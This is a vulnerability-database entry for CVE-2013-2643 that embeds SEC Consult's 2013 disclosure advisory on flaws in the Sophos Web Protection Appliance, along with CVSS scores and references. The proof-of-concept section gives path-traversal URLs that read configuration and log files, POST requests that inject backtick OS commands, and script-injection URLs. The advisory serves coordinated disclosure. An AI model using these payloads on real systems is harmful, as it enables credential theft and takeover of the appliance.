ID

VAR-201403-0044


CVE

CVE-2013-2643


TITLE

Sophos Web Appliance Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2013-006230

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in Sophos Web Appliance before 3.7.8.2 allow remote attackers to inject arbitrary web script or HTML via the (1) xss parameter in an allow action to rss.php, (2) msg parameter to end-user/errdoc.php, (3) h parameter to end-user/ftp_redirect.php, or (4) threat parameter to the Blocked component. Sophos Web Appliance Contains a cross-site scripting vulnerability.By any third party, any Web Script or HTML May be inserted. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Versions prior to Sophos Web Protection Appliance 3.7.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. SEC Consult Vulnerability Lab Security Advisory < 20130403-0 > ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: <= 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 homepage: http://www.sophos.com/ found: 2013-01-14 by: Wolfgang Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- "Our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users." URL: http://www.sophos.com/en-us/products/web/web-protection.aspx Business recommendation: ------------------------ SEC Consult has identified several vulnerabilities within the components of the Sophos Web Protection Appliance in the course of a short crash test. Some components have been spot-checked, while others have not been tested at all. An attacker can get unauthorized access to the appliance and plant backdoors or access configuration files containing credentials for other systems (eg. Active Directory/FTP login) which can be used in further attacks. Since all web traffic passes through the appliance, interception of HTTP as well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), including sensitive information like passwords and session Cookies is possible. If HTTPS Scanning is enabled, the appliance holds a private key for a Certificate Authority (CA) certificate that is installed/trusted on all workstations in the company. If this private key is compromised by an attacker, arbitrary certificates can be signed. These certificates will then pass validation on the client machines, enabling in various attacks targeting clients (MITM, phishing, evilgrade, ...). The recommendation of SEC Consult is to switch off the product until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the vendor. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) Unauthenticated users can read arbitrary files from the filesystem with the privileges of the "spiderman" operating system user. These files include configuration files containing sensitive information such as clear text passwords which can be used in other attacks. Furthermore the webserver log file which holds valid PHP session IDs can be accessed. With this information administrator users can be impersonated. 2) OS command injection (CVE-2013-2642) Authenticated users can execute arbitrary commands on the underlying operating system with the privileges of the "spiderman" operating system user. This can be used to get persistent access to the affected system (eg. by planting backdoors), accessing all kinds locally stored information or intercepting web traffic that passes through the appliance. Unauthenticated users can exploit this kind of vulnerability too (depends on appliance configuration). 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) Reflected Cross Site Scripting vulnerabilities were found. An attacker can use these vulnerabilities the exploit other vulnerabilities in the web interface or conducting phishing attacks. Proof of concept: ----------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) As an example, an unauthenticated user can download the configuration file containing the salted hash of the administrator password as well as clear text passwords e.g. for FTP backup storage or Active Directory authentication: https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 Furthermore the Apache access log can be retrieved. As PHP session IDs are passed via the URL rather than via Cookies, these can be found in this log file and effectively used to impersonate administrator users: https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00 An excerpt from the log file shows that it contains PHP session ID information (parameter "STYLE"). <host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" 2) OS command injection (CVE-2013-2642) The "Diagnostic Tools" functionality allows an authenticated user to inject arbitrary operating system commands enclosed in backticks (`). These commands are run with the privileges of the operating system user "spiderman": POST /index.php?c=diagnostic_tools HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 92 Cache-Control: no-cache action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60 The "Local Site List" functionality allows injection of arbitrary OS commands: POST /index.php?c=local_site_list_editor HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 205 STYLE=<valid session id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Note: Unauthenticated users can retrieve valid session IDs using the vulnerability in 1). If a customized template for the "Block page" uses the variable "%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the following URL: https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) The following URLs demonstrate reflected Cross Site Scripting vulnerabilities: https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E As the application uses URL parameters to transmit session IDs and rather than cookies, session stealing attacks cannot be executed using these flaws. However, these vulnerabilities can still be used to fake login pages for phishing purposes. Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the XSS vulnerabilities. This enables attacks on the appliance even when the web interface would otherwise not be reachable to the attacker. Possible attack scenario: Use XSS to run malicous Javascript in the browser of a user who has network access to the web interface. This code can: - Exploit the local file disclosure vulnerability (see 1) in order to gain access to valid session IDs and impersonate administrator users. - Exploit the OS command injection (see 2) in order to execute arbitrary commands on the system. - Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the private key for the CA certificate used for HTTPS scanning (MITM). Vendor contact timeline: ------------------------ 2013-02-22: Sending advisory and proof of concept exploit via encrypted channel. 2013-02-23: Vendor acknowledges receipt of advisory. 2013-03-01: Vendor confirms reported issues and provides preliminary information about release dates. 2013-03-07: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule. 2013-03-18: Vendor starts rollout of update to "a first group of customers". 2013-04-03: SEC Consult releases coordinated security advisory. More information can be found at: http://www.sophos.com/en-us/support/knowledgebase/118969.aspx Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com http://blog.sec-consult.com EOF Wolfgang Ettlinger, Stefan Viehb\xf6ck / @2013

Trust: 2.07

sources: NVD: CVE-2013-2643 // JVNDB: JVNDB-2013-006230 // BID: 58834 // VULHUB: VHN-62645 // PACKETSTORM: 121060

AFFECTED PRODUCTS

vendor:sophosmodel:web appliancescope:lteversion:3.7.8.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion: -

Trust: 1.0

vendor:sophosmodel:web appliancescope: - version: -

Trust: 0.8

vendor:sophosmodel:web appliancescope:ltversion:3.7.8.2

Trust: 0.8

vendor:sophosmodel:web appliancescope:eqversion:3.7.8.1

Trust: 0.6

sources: JVNDB: JVNDB-2013-006230 // CNNVD: CNNVD-201304-062 // NVD: CVE-2013-2643

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-2643
value: MEDIUM

Trust: 1.0

NVD: CVE-2013-2643
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201304-062
value: MEDIUM

Trust: 0.6

VULHUB: VHN-62645
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2013-2643
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-62645
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-62645 // JVNDB: JVNDB-2013-006230 // CNNVD: CNNVD-201304-062 // NVD: CVE-2013-2643

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-62645 // JVNDB: JVNDB-2013-006230 // NVD: CVE-2013-2643

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201304-062

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 121060 // CNNVD: CNNVD-201304-062

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-006230

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-62645

PATCH

title:118969url:http://www.sophos.com/en-us/support/knowledgebase/118969.aspx

Trust: 0.8

sources: JVNDB: JVNDB-2013-006230

EXTERNAL IDS

db:NVDid:CVE-2013-2643

Trust: 2.9

db:JVNDBid:JVNDB-2013-006230

Trust: 0.8

db:CNNVDid:CNNVD-201304-062

Trust: 0.7

db:SECUNIAid:52814

Trust: 0.6

db:BIDid:58834

Trust: 0.4

db:EXPLOIT-DBid:24932

Trust: 0.1

db:VULHUBid:VHN-62645

Trust: 0.1

db:PACKETSTORMid:121060

Trust: 0.1

sources: VULHUB: VHN-62645 // BID: 58834 // JVNDB: JVNDB-2013-006230 // PACKETSTORM: 121060 // CNNVD: CNNVD-201304-062 // NVD: CVE-2013-2643

REFERENCES

url:https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_sophos_web_protection_appliance_multiple_vulnerabilities.txt

Trust: 2.5

url:http://www.sophos.com/en-us/support/knowledgebase/118969.aspx

Trust: 1.8

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2643

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-2643

Trust: 0.8

url:http://secunia.com/advisories/52814

Trust: 0.6

url:http://www.sophos.com/

Trust: 0.4

url:https://<host>/end-user/errdoc.php?e=530&msg=phnjcmlwdd5hbgvydcgnehnzjyk7pc9zy3jpchq%2bcg%3d%3d

Trust: 0.1

url:https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3cscript%3ealert%281%29%3c/script%3e

Trust: 0.1

url:https://www.sec-consult.com

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2641

Trust: 0.1

url:https://<host>/end-user/ftp_redirect.php?r=x&h=%3c/script%3e%3cscript%3ealert%281%29%3b%3c/script%3e

Trust: 0.1

url:http://www.sophos.com/en-us/products/web/web-protection.aspx

Trust: 0.1

url:https://<host>/index.php?section=configuration&c=configuration&style=8514d0a3c2fc9f8d47e2988076778153"

Trust: 0.1

url:https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2642

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2643

Trust: 0.1

url:http://blog.sec-consult.com

Trust: 0.1

url:https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00

Trust: 0.1

url:https://<host>/rss.php?action=allow&xss=%3cscript%3ealert%28string.fromcharcode%28120,%20115,%20115%29%29%3c/script%3e

Trust: 0.1

url:https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60

Trust: 0.1

url:https://www.sec-consult.com/en/vulnerability-lab/advisories.htm

Trust: 0.1

sources: VULHUB: VHN-62645 // BID: 58834 // JVNDB: JVNDB-2013-006230 // PACKETSTORM: 121060 // CNNVD: CNNVD-201304-062 // NVD: CVE-2013-2643

CREDITS

Wolfgang Ettlinger of SEC Consult Vulnerability Lab

Trust: 0.3

sources: BID: 58834

SOURCES

db:VULHUBid:VHN-62645
db:BIDid:58834
db:JVNDBid:JVNDB-2013-006230
db:PACKETSTORMid:121060
db:CNNVDid:CNNVD-201304-062
db:NVDid:CVE-2013-2643

LAST UPDATE DATE

2025-04-13T23:10:19.586000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-62645date:2014-03-19T00:00:00
db:BIDid:58834date:2013-04-03T00:00:00
db:JVNDBid:JVNDB-2013-006230date:2014-03-24T00:00:00
db:CNNVDid:CNNVD-201304-062date:2014-03-20T00:00:00
db:NVDid:CVE-2013-2643date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:VULHUBid:VHN-62645date:2014-03-18T00:00:00
db:BIDid:58834date:2013-04-03T00:00:00
db:JVNDBid:JVNDB-2013-006230date:2014-03-24T00:00:00
db:PACKETSTORMid:121060date:2013-04-03T14:44:44
db:CNNVDid:CNNVD-201304-062date:2013-04-11T00:00:00
db:NVDid:CVE-2013-2643date:2014-03-18T17:02:51.887